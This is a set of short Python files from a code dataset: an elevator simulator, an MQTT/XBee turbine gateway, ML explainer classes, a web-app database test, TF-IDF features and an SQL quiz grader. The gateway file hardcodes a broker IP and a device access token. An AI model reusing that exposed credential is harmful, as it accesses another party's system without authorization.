Elevator:\n def __init__(self, bottom, top, current):\n \"\"\"Initializes the Elevator instance.\"\"\"\n self.bottom = bottom\n self.top = top\n self.current = current\n pass\n def __str__(self):\n return \"Current floor: {}\".format(self.current)\n def up(self):\n \"\"\"Makes the elevator go up one floor.\"\"\"\n if self.current < 10:\n self.current +=1\n else:\n print(\"No such floor\")\n def down(self):\n \"\"\"Makes the elevator go down one floor.\"\"\"\n if self.current > 0:\n self.current -=1\n else:\n print(\"No such floor\")\n def go_to(self, floor):\n \"\"\"Makes the elevator go to the specific floor.\"\"\"\n global count\n count=0\n while True:\n if self.current == floor:\n print(\"Floor reached\")\n break\n elif floor < self.current:\n self.down()\n count=count-1\n elif floor > self.current:\n self.up()\n count=count+1\nelevator = Elevator(-1, 10, 0)\nwhile True:\n tf=int(input(\"Enter the required floor: \"))\n print(elevator.current)\n elevator.go_to(tf)\n print(\"Elevator movement: \",count)\n \n","repo_name":"Psri-01/PyPrac","sub_path":"elevator.py","file_name":"elevator.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23516955830","text":"#This is my attempt at a complete gateway progtam serving as an interface between the thingsboard.io based user interface and the xbee based turbine network.\n\nimport serial #for connecting to local xbee through serial port\nfrom digi.xbee.devices import XBeeDevice, RemoteXBeeDevice, XBee64BitAddress #for interacting with xbee network\nimport paho.mqtt.client as mqtt #for interacting with thingsboard.io through mqtt messaging protocol\nimport json #makes converting between json libraries and strings easier. This helps processing mqtt messages.\nimport time #Is this still needed?\nimport threading #is this still needed?\nimport csv #Allows us to read in comma seperated value (csv) data files. Used to read inputFile.txt\n\n\n###################################################################################\n### Part 1: MQTT stuff\n###################################################################################\nmqttBroker = \"192.155.83.191\" #This is the instance of thingsboard that we installed on ???\nmqttClientId = \"ewanderson\" #This can be anything, but you have to pick a unique Id so thingsboard can keep track of what messages it has already sent you.\nmqttUserName = \"EoF9kjhJz0ESHHnTJmsD\" #this is the access token for the thingsboard gateway device\n\ntopicAttr = \"v1/gateway/attributes\" #This is the topic for sending attributes through a gateway in thingsboard \ntopicGtwyAttr = 'v1/devices/me/attributes'\ntopicTelem = \"v1/gateway/telemetry\" #This is the topic for sending telemetry through a gateway in thingsboard \ntopicConnect = \"v1/gateway/connect\"\n\n# The callback for when we recieve a CONNACK response from the MQTT server.\ndef on_connect(MQTT, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc)) #result code 0 means sucessfuly connected\n MQTT.subscribe(\"v1/devices/me/rpc/request/+\") #Subscribing to receive RPC requests\n MQTT.subscribe(\"v1/devices/me/attributes/response/+\") #subscribe to receive answers when we request attributes from the MQTT server\n\n# The callback when we receive a message from the MQTT server.\ndef on_message(client, userdata, msg):\n\tglobal MQTT_message, new_MQTT_message\n\tprint('Topic: ',msg.topic,'\\nMessage: ',str(msg.payload))\n\tMQTT_message = msg\n\tnew_MQTT_message = True \n\t\n#This reads the turbine parameter input file inputFile.txt and formats the data in the necessary libraries that will be used by other parts of this program.\ndef readTurbineInputFile(): \n\taddr2name = {}\n\tname2addr = {}\n\twith open('inputFile.txt') as f : #read input file and store data in the list turbArrayProps\n\t\treader = csv.reader(f, delimiter=\"\\t\")\n\t\tturbArrayProps = list(reader)\n\tfor i in range(1, len(turbArrayProps)): #process each row in input file\n\t\tname = turbArrayProps[i][0]\n\t\taddress = '0013a200'+turbArrayProps[i][1]\n\t\tlatitude = turbArrayProps[i][2]\n\t\tlongitude = turbArrayProps[i][3]\n\t\taddr2name[address] = name #to find a turbine name from the remote XBee address\n\t\tname2addr[name] = address #The reverse of the previous dictionary. Used to find the remote XBee address from a turbine name\n\t\tMQTT.publish(topicConnect, json.dumps({'device':name})) #Tell thingsboard that this turbine is connected\n\t\tMQTT.publish(topicAttr,json.dumps({name:{'latitude':latitude,'longitude':longitude}})) #Tell thingsboard the position of this turbine\n\treturn addr2name, name2addr\n\n#This is called once when the program starts. It processes a message from thingsboard containing several attribute values required by other parts of this program.\ndef attribute_message(data): \n global safety_switch, turbineOnOff_switch\n print('recieved current switch status from Thingsboard')\n data = data.get('client')\n safety_switch = data.get('safety_switch')\n turbineOnOff_switch = data.get('turbineOnOff_switch')\n \n\n","repo_name":"ewandersonUCDavis/XBee_Python","sub_path":"python3/gateway.py","file_name":"gateway.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31625514224","text":"from pdpbox import pdp\nfrom matplotlib import pyplot as plt\n\nimport eli5\nfrom eli5.sklearn import PermutationImportance\n\nimport warnings\n\nimport pandas as pd\nimport numpy as np\nimport shap\n\nfrom abc import ABC, abstractmethod\n\nimport itertools\n\nclass BaseExplainer(ABC):\n \"\"\"\n Базовый класс для интерпретатора.\n \"\"\"\n\n @abstractmethod\n def fit(self):\n \"\"\"\n Применение вычислительной функции к данным\n :returns: Интерпретатор с расчитанными значениями анализаторов\n \"\"\"\n pass\n\n @abstractmethod\n def to_disc(self, path: str):\n \"\"\"\n Сериализация модели отбора признаков на диск\n \"\"\"\n pass\n\n @classmethod\n @abstractmethod\n def from_disc(cls, path: str):\n \"\"\"\n Чтение модели отбора признаков с диска\n \"\"\"\n pass\n\nclass PdExplainer(BaseExplainer):\n \"\"\"Класс PdExplainer используется для интерпретации моделей машинного обучения.\n\n Основное применение - интерпретация моделей с помощью Partial Dependence.\n\n Note:\n Класс использует библиотеку PDP-Box(https://github.com/SauceCat/PDPbox). \n Наиболее простая установка через conda-forge(https://github.com/conda-forge/pdpbox-feedstock).\n \n Attributes\n ----------\n model : None\n предобученная модель\n x : pd.DataFrame\n данные с признаками (Например: X, X_test, X_train и т.д.)\n model_features : list\n список признаков(названий колонок) \n features : list\n список признаков(названий колонок) для которых будет вычисляться PartialDependence\n \"\"\"\n\n def __init__(\n self,\n model,\n x: pd.DataFrame,\n model_features: list,\n features: list):\n \"\"\"\n Args:\n model: предобученная модель\n x: данные с признаками (Например: X, X_test, X_train и т.д.)\n model_features: список признаков(названий колонок)\n features: список признаков(названий колонок) для которых будет вычисляться PartialDependence\n \"\"\"\n self.model = model\n self.X = x\n self.model_features = model_features\n self.features=features\n\n def fit(self,fit_pairs=False) -> None:\n \"\"\"\n Метод вычисляет значения параметров, которые используются для интерпретации Partial Dependence.\n :param fit_pairs: По умолчанию False. Если True, то PartialDependence будет расчитан не только для признаков в отдельности, но и для пар признаков.\n :return: Интерпретатор с расчитанными параметрами PartialDependence.\n \"\"\"\n features = self.features\n pdp_feat_list=[]\n\n for feat in features:\n pdp_feat = pdp.pdp_isolate(model=self.model, dataset=self.X, model_features=self.model_features, feature=feat)\n pdp_feat_list.append(pdp_feat)\n \n self.pdp_feat = dict(zip(features, pdp_feat_list)) \n print('Fitted features:')\n print(list(self.pdp_feat.keys()))\n\n if (len(self.features)>=2) & (fit_pairs==True):\n\n pdp_intr_list=[]\n features_pairs = list(itertools.combinations(features, 2))\n\n for pair in features_pairs:\n pdp_intr = pdp.pdp_interact(model=self.model, dataset=self.X, model_features=self.model_features, features=pair)\n pdp_intr_list.append(pdp_intr)\n \n self.pdp_intr = dict(zip(features_pairs, pdp_intr_list)) \n print('Fitted pairs:')\n print(str(list(self.pdp_intr.keys()))) \n\n\n def plot_pdp(self, feature_name: str) -> None:\n \"\"\"\n Метод строит PDP для одного признака.\n :param feature_name: название признака(колонки)\n \"\"\"\n isolate_output = self.pdp_feat.get(feature_name)\n fig, axes = pdp.pdp_plot(isolate_output,feature_name)\n\n return fig, axes\n \n def plot_pdp_pair(self,pair_name: tuple) -> None:\n \"\"\"\n Метод строит PDP для пары признаков.\n :param pair_name: кортеж из двух названий признаков(колонок)\n \"\"\"\n interact_output = self.pdp_intr.get(pair_name)\n fig, axes = pdp.pdp_interact_plot(interact_output,pair_name)\n\n return fig, axes \n \n\n def to_disc(self, path: str) -> None:\n joblib.dump(self.model, path)\n\n @classmethod\n def from_disc(cls, path: str) -> 'PdExplainer':\n explainer = joblib.load(path)\n return explainer\n\n\nclass ShapExplainer(BaseExplainer):\n \"\"\"Класс ShapExplainer используется для интерпретации моделей машинного обучения.\n\n Основное применение - интерпретация моделей с помощью SHAPley values.\n \n Attributes\n ----------\n model : None\n предобученная модель\n x : pd.DataFrame\n данные с признаками (Например: X, X_test, X_train и т.д.)\n \"\"\"\n\n def __init__(\n self,\n model,\n x: pd.DataFrame,\n ):\n \"\"\"\n Args:\n model: предобученная модель\n x: данные с признаками (Например: X, X_test, X_train и т.д.)\n \"\"\"\n self.model = model \n self.X = x\n \n def fit(self):\n \"\"\"\n Метод вычисляет значения SHAP, которые используются для интерпретации SHAP.\n \"\"\"\n shap.initjs()\n model_explainer = shap.KernelExplainer(self.model.predict, shap.kmeans(self.X,10).data)\n \n shap_values = model_explainer.shap_values(self.X)\n expected_value = model_explainer.expected_value\n \n self.shap_values = shap_values\n self.expected_value = expected_value \n\n def plot_shap_summary(self):\n \"\"\"\n Метод строит график SHAP summary.\n \"\"\"\n ax = shap.summary_plot(self.shap_values, self.X,feature_names=self.X.columns.to_list())\n return ax\n\n def plot_shap_importance(self):\n \"\"\"\n Метод строит график SHAP importance.\n \"\"\"\n ax = shap.summary_plot(self.shap_values, self.X, feature_names=self.X.columns.to_list(),plot_type=\"bar\")\n return ax \n\n def plot_shap_dependence(self,feature: str):\n \"\"\"\n Метод строит график SHAP dependence для выбранного признака(колонки).\n :param feature: название признака(колонки) для которой будет построен график\n \"\"\"\n ax = shap.dependence_plot(feature, self.shap_values, self.X)\n return ax \n\n def plot_shap_force(self,idx):\n \"\"\"\n Метод строит график SHAP force для выбранного наблюдения из датасета.\n :param idx: индекс наблюдения в датасете\n \"\"\"\n ax = shap.force_plot(self.expected_value, self.shap_values[idx,:], self.X.iloc[idx,:],feature_names=self.X.columns.to_list())\n return ax \n\n def to_disc(self, path: str) -> None:\n joblib.dump(self.model, path)\n\n @classmethod\n def from_disc(cls, path: str) -> 'ShapExplainer':\n explainer = joblib.load(path)\n return explainer\n\n# from eli5.sklearn import PermutationImportance\n\n# perm = PermutationImportance(rf).fit(X_train, Y_train)\n# eli5.show_weights(perm, feature_names=X.columns.tolist())\n\n\nclass PermImpExplainer(BaseExplainer):\n \"\"\"Класс PermImpExplainer используется для интерпретации моделей машинного обучения.\n\n Основное применение - интерпретация моделей с помощью Permutation Importance.\n \n Attributes\n ----------\n model : None\n предобученная модель\n x : pd.DataFrame\n данные с признаками (Например: X, X_test, X_train и т.д.)\n y : pd.DataFrame\n данные с таргетом (Например: y, y_test, y_train и т.д.)\n \"\"\"\n\n def __init__(\n self,\n model,\n x: pd.DataFrame,\n y: pd.DataFrame):\n \"\"\"\n Args:\n model: предобученная модель\n x: данные с признаками (Например: X, X_test, X_train и т.д.)\n y: данные с таргетом (Например: y, y_test, y_train и т.д.)\n \"\"\"\n self.model = model\n self.X = x\n self.y = y\n\n def fit(self) -> None:\n \"\"\"\n Метод вычисляет значения параметров, которые используются для интерпретации Permutation Importance.\n \"\"\"\n perm = PermutationImportance(self.model).fit(self.X, self.y)\n self.perm = perm\n\n\n def plot_PIweights(self) -> None:\n \"\"\"\n Метод выводит значения Permutation Importance.\n \"\"\"\n from IPython.display import display\n display(eli5.show_weights(self.perm, feature_names=self.X.columns.tolist())) \n\n def to_disc(self, path: str) -> None:\n joblib.dump(self.model, path)\n\n @classmethod\n def from_disc(cls, path: str) -> 'PermImpExplainer':\n explainer = joblib.load(path)\n return explainer","repo_name":"JustPlatinum/Model-explainer","sub_path":"explainer.py","file_name":"explainer.py","file_ext":"py","file_size_in_byte":10325,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5861651933","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFrom https://github.com/OneZoom/OZtree/issues/62\n\n1) Test no js errors on main page (also that it zooms to the right place) - see http://blog.amolchavan.space/capture-javascript-console-error-using-selenium-webdriver/\n2) Test the iframe popups\n\"\"\"\nimport os.path\nfrom nose import tools\nfrom nose.plugins.skip import SkipTest\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nfrom ...util import base_url, web2py_app_dir\nfrom ..functional_tests import FunctionalTest, make_temp_minlife_file, remove_temp_minlife_files\n\nclass TestTreeDataMismatch(FunctionalTest):\n \"\"\"\n Test whether we get an error page if there is a version mismatch \n This requires a bit of database adjusting, but not too dangerously (we swap 2 numbers, then swap back)\n It is only relevant if we are running a local version of the website\n \"\"\"\n unused_version = 2 # set to a non-allowed (negative) tree version number\n old_version = 1234 #should look up files that exist with an old version number\n\n @classmethod\n def setUpClass(self):\n if not self.is_local:\n raise SkipTest(\"Mismatch test requires altering the DB so can only run locally\")\n print(\"== Running {} ==\".format(os.path.basename(__file__)))\n super().setUpClass() #will assign db etc\n self.temp_minlife = make_temp_minlife_file(self) #must do this before changing table IDs\n print(\">> swapping data in row 1 of ordered_nodes table to force temporary mismatch\")\n db_cursor = self.db['connection'].cursor()\n #parent of row 1 should contain the (negative) version number and real_parent should always be 0\n sql=\"UPDATE ordered_nodes set real_parent = parent where id = 1 LIMIT 1\"\n db_cursor.execute(sql)\n sql=\"UPDATE ordered_nodes set parent = {} where id = 1 LIMIT 1\".format(self.db['subs'])\n db_cursor.execute(sql, (-self.unused_version,)) # versions are stored as negative numbers\n self.db['connection'].commit() #need to commit here otherwise next select returns stale data\n db_cursor.close()\n \n @classmethod\n def tearDownClass(self):\n remove_temp_minlife_files(self)\n print(\">> restoring original version number to root node in database, and setting root node real_parent to 0\")\n db_cursor = self.db['connection'].cursor()\n #parent of row 1 should contain the (negative) version number and real_parent should always be 0\n sql=\"UPDATE ordered_nodes set parent = real_parent WHERE id = 1 AND parent = {} LIMIT 1\".format(self.db['subs'])\n db_cursor.execute(sql, (-self.unused_version,))\n sql=\"UPDATE ordered_nodes SET real_parent = {} where id = 1 LIMIT 1\".format(self.db['subs'])\n db_cursor.execute(sql, (0,)) # real_parent of the root should always be 0\n self.db['connection'].commit() #need to commit here otherwise next select returns stale data\n db_cursor.close()\n super().tearDownClass()\n\n\n @tools.nottest\n def test_mismatch(self, controller, base=base_url):\n self.browser.get(base + controller)\n wait = WebDriverWait(self.browser, 10)\n wait.until(EC.presence_of_element_located((By.ID, \"version-error\")))\n assert \"version {}\".format(self.unused_version) in self.browser.find_element_by_tag_name(\"blockquote\").text, \\\n \"On mismatch, {} tree should show the version number\".format(controller)\n\n def test_life_mismatch(self):\n \"\"\"\n The default tree viewer should show mismatch\n \"\"\"\n #can't go to the top level here beacuse we have set a silly real_parent number (non-existent)\n self.test_mismatch(\"life/@={}\".format(self.humanOTT))\n\n def test_life_MD_mismatch(self):\n \"\"\"\n The museum display viewer should show mismatch\n \"\"\"\n self.test_mismatch(\"life_MD/@={}\".format(self.humanOTT))\n\n def test_expert_mode_mismatch(self):\n \"\"\"\n The expert mode viewer (e.g. with screenshot functionality) should show mismatch\n \"\"\"\n self.test_mismatch(\"life_expert/@={}\".format(self.humanOTT))\n\n def test_AT_mismatch(self):\n \"\"\"\n The Ancestor's Tale tree (different colours) should show mismatch\n \"\"\"\n self.test_mismatch(\"AT/@={}\".format(self.humanOTT))\n\n def test_trail2016_mismatch(self):\n \"\"\"\n The Ancestor's Trail tree (different sponsorship details) should show mismatch\n \"\"\"\n self.test_mismatch(\"trail2016/@={}\".format(self.humanOTT))\n\n def test_linnean_mismatch(self):\n \"\"\"\n The Linnean Soc tree (different sponsorship details) should show mismatch\n \"\"\"\n self.test_mismatch(\"linnean/@={}\".format(self.humanOTT))\n\n def test_text_tree_mismatch(self):\n \"\"\"\n The text-only tree (e.g. for humans=ott 770315) should still work, as it does not require files to match the db version\n \"\"\"\n self.browser.get(base_url + \"life_text/@={}\".format(self.humanOTT))\n assert self.element_by_class_exists('text_tree'), \"Should have the text tree in a labelled div\"\n assert self.element_by_class_exists('species'), \"Should have the species in a labelled div\"\n\n def test_text_tree_root_absent(self):\n \"\"\"\n TO DO --- Should the text-only tree should be missing the root node? Depends on what we expect. Needs more thought\n \"\"\"\n self.browser.get(base_url + \"life_text/@={}\".format(self.mammalOTT))\n assert self.element_by_class_exists('text_tree'), \"Should have the text tree in a labelled div\"\n #assert not self.element_by_class_exists('text_tree_root'), \"Should not have the root of the text tree\"\n\n def test_minlife_available(self):\n \"\"\"\n The minlife view for restricted installation should show mismatch error\n \"\"\"\n self.test_mismatch(\"treeviewer/minlife\".format(self.humanOTT))\n\n def test_minlife_static(self):\n \"\"\"\n The temporary minlife file in static should show a mismatch error\n \"\"\"\n self.test_mismatch(self.temp_minlife, \"file://\")\n\n def test_minlife_old_download(self):\n \"\"\"\n Check what happens if the downloaded minlife version is an old one that does not match the version in the API\n Here we should set the \n \"\"\"\n #make a minlife file with the bad (\"unused_version\") number\n old_minlife = make_temp_minlife_file(self)\n ","repo_name":"OneZoom/OZtree","sub_path":"tests/functional/treeviewer/test_tree_data_mismatch.py","file_name":"test_tree_data_mismatch.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"78"} +{"seq_id":"31781017744","text":"adventure ={\n \"name\" : \"Light\",\n \"age\" : 17,\n \"strength\" : 8,\n \"defense\" : 10,\n \"Hp\" : 100,\n \"backpack\" : [\"shield\", \"bread loaf\"],\n \"gold\" : 100,\n \"level\" : 2\n}\nadventure[\"gold\"] +=50\nadventure[\"backpack\"].append(\"flintstone\")\nadventure[\"pocket\"]=[\"monsterdex\", \"flashlight\"]\nprint(adventure)\n","repo_name":"phanhr/c4t-20","sub_path":"hack3/part7.py","file_name":"part7.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31747285274","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import OneHotEncoder,LabelEncoder,StandardScaler\r\nfrom sklearn.decomposition import TruncatedSVD,PCA\r\nfrom sklearn.metrics.pairwise import cosine_similarity, pairwise_distances\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nseed = 1024\r\nnp.random.seed(seed)\r\npath = \"model/\"\r\n\r\ndef calc_cosine_dist(text_a ,text_b):\r\n #return pairwise_distances(text_a, text_b, metric='cosine')[0][0]\r\n #y = cosine_similarity(text_a, text_b)[0][0]\r\n y = pairwise_distances(text_a, text_b, metric='l2')[0][0]\r\n return y\r\n\r\n\r\n\r\n\r\nprint('Tfidf word Similarity part')\r\n\r\ntrain_question1_tfidf = pd.read_pickle(path+'train_word1_bigram_tfidf_v2.pkl')\r\ntest_question1_tfidf = pd.read_pickle(path+'test_word1_bigram_tfidf_v2.pkl')\r\ntrain_question2_tfidf = pd.read_pickle(path+'train_word2_bigram_tfidf_v2.pkl')\r\ntest_question2_tfidf = pd.read_pickle(path+'test_word2_bigram_tfidf_v2.pkl')\r\n\r\ntrain_tfidf_sim = []\r\nfor r1,r2 in zip(train_question1_tfidf,train_question2_tfidf):\r\n train_tfidf_sim.append(calc_cosine_dist(r1,r2))\r\ntest_tfidf_sim = []\r\nfor r1,r2 in zip(test_question1_tfidf,test_question2_tfidf):\r\n test_tfidf_sim.append(calc_cosine_dist(r1,r2))\r\ntrain_tfidf_sim = np.array(train_tfidf_sim)\r\ntest_tfidf_sim = np.array(test_tfidf_sim)\r\nX = pd.DataFrame()\r\nY=pd.DataFrame()\r\nX[\"tfidf_word_bigram_sim\"]=train_tfidf_sim\r\nY[\"tfidf_word_bigram_sim\"]=test_tfidf_sim\r\n\r\nprint(X)\r\n\r\n\r\ndel train_question1_tfidf\r\ndel test_question1_tfidf\r\ndel train_question2_tfidf\r\ndel test_question2_tfidf\r\n\r\nprint('Tfidf char Similarity part')\r\ntrain_question1_bigram_tfidf = pd.read_pickle(path+'train_char1_bigram_tfidf_v2.pkl')\r\ntest_question1_bigram_tfidf = pd.read_pickle(path+'test_char1_bigram_tfidf_v2.pkl')\r\ntrain_question2_bigram_tfidf = pd.read_pickle(path+'train_char2_bigram_tfidf_v2.pkl')\r\ntest_question2_bigram_tfidf = pd.read_pickle(path+'test_char2_bigram_tfidf_v2.pkl')\r\n\r\ntrain_bigram_tfidf_sim = []\r\nfor r1,r2 in zip(train_question1_bigram_tfidf,train_question2_bigram_tfidf):\r\n train_bigram_tfidf_sim.append(calc_cosine_dist(r1,r2))\r\ntest_bigram_tfidf_sim = []\r\nfor r1,r2 in zip(test_question1_bigram_tfidf,test_question2_bigram_tfidf):\r\n test_bigram_tfidf_sim.append(calc_cosine_dist(r1,r2))\r\ntrain_bigram_tfidf_sim = np.array(train_bigram_tfidf_sim)\r\ntest_bigram_tfidf_sim = np.array(test_bigram_tfidf_sim)\r\n# pd.to_pickle(train_bigram_tfidf_sim,path+\"train_bigram_tfidf_sim.pkl\")\r\n# pd.to_pickle(test_bigram_tfidf_sim,path+\"test_bigram_tfidf_sim.pkl\")\r\nX[\"tfidf_char_bigram_sim\"]=train_bigram_tfidf_sim\r\nY[\"tfidf_char_bigram_sim\"]=test_bigram_tfidf_sim\r\ndel train_question1_bigram_tfidf\r\ndel test_question1_bigram_tfidf\r\ndel train_question2_bigram_tfidf\r\ndel test_question2_bigram_tfidf\r\nX.to_csv('feature/tfidf_sim_l2_bigram_train.csv', index=False)\r\nY.to_csv('feature/tfidf_sim_l2_bigram_test.csv', index=False)","repo_name":"CortexFoundation/paipaidai-rank10","sub_path":"features/generate_tfidf_feature_2.py","file_name":"generate_tfidf_feature_2.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"70374230331","text":"def subarr(arr, n):\n\tsum = 0\n\ts = set()\n\n\tfor i in range(n):\n\t\tsum += arr[i]\n\t\tif sum == 0 or sum in s:\n\t\t\treturn True\n\t\ts.add(sum)\n\n\treturn False\n\n\narr = [4, 2, -3, 1, 6]\nn = len(arr)\nif subarr(arr, n) == True:\n\tprint(\"Found a sunbarray with sum 0\")\nelse:\n\tprint(\"No Such sub array exits!\")","repo_name":"9syed/Python-Problems-Solving","sub_path":"Subarray with 0 sum.py","file_name":"Subarray with 0 sum.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40541282571","text":"from sqlalchemy import create_engine, text\nfrom fpdf import FPDF, XPos, YPos\nfrom grader import *\nimport time\n\n# engine = create_engine(\"mysql+pymysql://sql12658112:yFlLxXMggz@sql12.freemysqlhosting.net/sql12658112\")\n# connection = engine.connect()\n\n\nstart_time = time.time()\n\nquestions = [ \n \"List all the students with their email addresses.\",\n \"Find the total number of students enrolled in each course.\",\n \"Provide the names of instructors along with the courses they teach.\",\n# \"Get all the assignments due in the next 30 days.\",\n# \"Identify the students who are not enrolled in any courses.\",\n# \"Display the courses along with the names of students enrolled and their enrollment dates.\",\n \"Retrieve all blogger names and their email addresses.\",\n \"List all blog posts along with their corresponding blogger names.\",\n# \"Find the number of comments made on each blog post.\",\n# \"Get the most recent comments for each blog post.\",\n# \"Display all comments made by a specific blogger.\",\n# \"Show the titles of blog posts that do not have any comments.\"\n ]\n\nc_queries = [\n \"SELECT FirstName, LastName, Email FROM Student;\",\n \"SELECT CourseID, COUNT(StudentID) AS NumberOfStudents FROM Enrollment GROUP BY CourseID;\",\n \"SELECT i.InstructorName, c.CourseName FROM Instructor i JOIN Course c ON i.InstructorID = c.InstructorID GROUP BY CourseID ORDER BY CourseID;\",\n# \"SELECT AssignmentName, DueDate FROM Assignment WHERE DueDate BETWEEN CURRENT_DATE AND CURRENT_DATE + INTERVAL '30' DAY;\",\n# \"SELECT * FROM Student WHERE StudentID NOT IN (SELECT StudentID FROM Enrollment);\",\n# \"SELECT c.CourseName, s.FirstName, s.LastName, e.EnrollmentDat FROM Course c JOIN Enrollment e ON c.CourseID = e.CourseID;\",\n \"SELECT BloggerName, Email FROM Blogger;\",\n \"SELECT b.BloggerName, bp.Title, bp.Conte FROM Blogger b JOIN BlogPost bp ON b.BloggerID = bp.Blogg;\",\n# \"SELECT bp.BlogP, bp.Title, COUNT(c.CommentID) AS NumberOfComments FROM BlogPost bp LEFT JOIN Comment c ON bp.BlogP = c.BlogPostID GROUP BY bp.BlogP;\",\n# \"SELECT bp.BlogP, bp.Title, c.CommentConte, c.CommentDate FROM BlogPost bp JOIN Comment c ON bp.BlogP = c.BlogPostID WHERE c.CommentDate IN (SELECT MAX(CommentDate) FROM Comment GROUP BY BlogPostID);\",\n# \"SELECT c.comment_cntnts, c.CommentDate FROM Comment c WHERE c.BloggerID = 30;\", \n# \"SELECT Title FROM BlogPost WHERE BlogP NOT IN (SELECT BlogPostID FROM Comment);\"\n]\n\nstu_queries = [\n \"SELECT first_name, last_name, Email_addr FROM Students;\",\n \"SELECT CourseID, COUNT(StudentID) AS NumberOfStudents FROM Enrollment ORDER BY CourseID;\",\n \"SELECT i.InstructorName, c.CourseName FROM Instructors i LEFT JOIN Courses c ON i.InstructorID = c.InstructorID\",\n# \"SELECT AssignmentName, DueDate FROM Assignment WHERE DueDate BETWEEN CURRENT_DATE AND CURRENT_DATE + INTERVAL '30' DAY;\",\n# \"SELECT * FROM Student WHERE StudentID NOT IN (SELECT StudentID FROM Enrollment);\",\n# \"SELECT c.CourseName, s.FirstName, s.LastName, e.EnrollmentDat FROM Course c INNER JOIN Enrollment e ON c.CourseID = e.CourseID;\",\n \"SELECT BloggerName, Email FROM Blogger;\",\n \"SELECT b.BloggerName, bp.Title FROM Blogger b JOIN BlogPost bp ON b.BloggerID = bp.Blogg;\",\n# \"SELECT bp.BlogP, bp.Title, COUNT(c.CommentID) AS NumberOfComments FROM BlogPost bp RIGHT JOIN Comment c ON bp.BlogP = c.BlogPostID ORDER BY bp.BlogP;\",\n# \"SELECT bp.BlogP, bp.Title, c.CommentConte, c.CommentDate FROM BlogPost bp JOIN Comment c ON bp.BlogP = c.BlogPostID WHERE c.CommentDate IN (SELECT MAX(CommentDate) FROM Comment GROUP BY BlogPostID);\",\n# \"SELECT c.CommentConte, c.CommentDate FROM Comment c WHERE c.BloggerID = 10;\", \n# \"SELECT Title FROM BlogPost WHERE BlogP NOT IN (SELECT BlogPostID FROM Comment);\"\n]\n\nend_time = time.time()\n\nprint(f\"Total time taken for grader: {end_time - start_time}\")\n\ntitle = \"Quiz Results\"\n\nclass PDF(FPDF):\n\n def set_page_margin(self):\n self.set_margin(20)\n \n\n def header(self):\n self.image(r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\images\\DataWiz-Logo.png', 10, 8, 16)\n self.set_font('Gilroy-Bold', '', 20)\n self.set_text_color(0, 0, 0)\n\n title_w = self.get_string_width(title) + 6\n doc_w = self.w\n self.set_x((doc_w - title_w)/2)\n\n self.set_line_width(1)\n\n self.cell(title_w, 10, title, align='C')\n self.ln(30)\n\n\n def footer(self):\n self.set_y(-15)\n self.set_font('Gilroy-MediumItalic', '', 10)\n self.set_text_color(169, 169, 169)\n self.cell(0, 10, f'Page {self.page_no()}', align='C')\n\n def question(self, num, qs):\n self.set_font('Gilroy-SemiBold', '', 14)\n self.set_fill_color(220, 207, 216)\n\n length = len(str(num)) + 70\n question = f'Question {num}'\n self.cell(length, 8, question, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=1)\n \n self.set_font('Gilroy-Regular', '', 12)\n self.set_fill_color(255, 244, 214)#(200, 220, 255)\n question = f'{qs}'\n self.multi_cell(0, 5, question, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=1)\n self.ln()\n\n def teacher_ans(self, question_answer):\n student_ans = f\"Correct Answer: \"\n self.set_font('Gilroy-Light', '', 11)\n self.cell(0, 7, student_ans, new_x=\"LMARGIN\", new_y=\"NEXT\")\n\n self.set_font('Gilroy-Regular', '', 13)\n self.multi_cell(0, 6, question_answer, new_x=\"LMARGIN\", new_y=\"NEXT\")\n self.ln()\n \n def student_ans(self, question_answer):\n student_ans = f\"Student Answer: \"\n self.set_font('Gilroy-Light', '', 11)\n self.cell(0, 7, student_ans, new_x=\"LMARGIN\", new_y=\"NEXT\")\n \n self.set_font('Gilroy-Regular', '', 13)\n # self.set_fill_color(169, 169, 169)\n self.multi_cell(0, 6, question_answer, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=0)\n self.ln()\n\n def autograding_results(self, result, score):\n autograder_text = f\"Autograding Results: \"\n self.set_font('Gilroy-Light', '', 11)\n self.cell(0, 7, autograder_text, new_x=\"LMARGIN\", new_y=\"NEXT\")\n \n self.set_font('Gilroy-Regular', '', 12)\n self.set_fill_color(224, 224, 225)#(221, 221, 221)\n self.multi_cell(0, 6, result, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=1)\n self.ln()\n\n self.set_font('Gilroy-Medium', '', 13)\n self.set_fill_color(224, 224, 225)#(221, 221, 221)\n scorer = f\"Score: {score}\"\n self.cell(0, 6, scorer, new_x=\"LMARGIN\", new_y=\"NEXT\", fill=1)\n self.ln()\n \n \n def print_qs_set(self, ques_num, ques, ques_ans, stu_ans, result, score):\n self.question(ques_num, ques)\n self.ln()\n self.teacher_ans(ques_ans)\n self.student_ans(stu_ans)\n self.ln()\n self.autograding_results(result, score)\n self.ln()\n\n \n\n\npdf = PDF('P', 'mm', 'A4')\n\npdf.add_font('Gilroy-Black', '', r'C:\\Users\\ASIF\\DataWiz\\general\\frontend\\src\\assets\\fonts\\Gilroy-Black.ttf')\npdf.add_font('Gilroy-Bold', '', 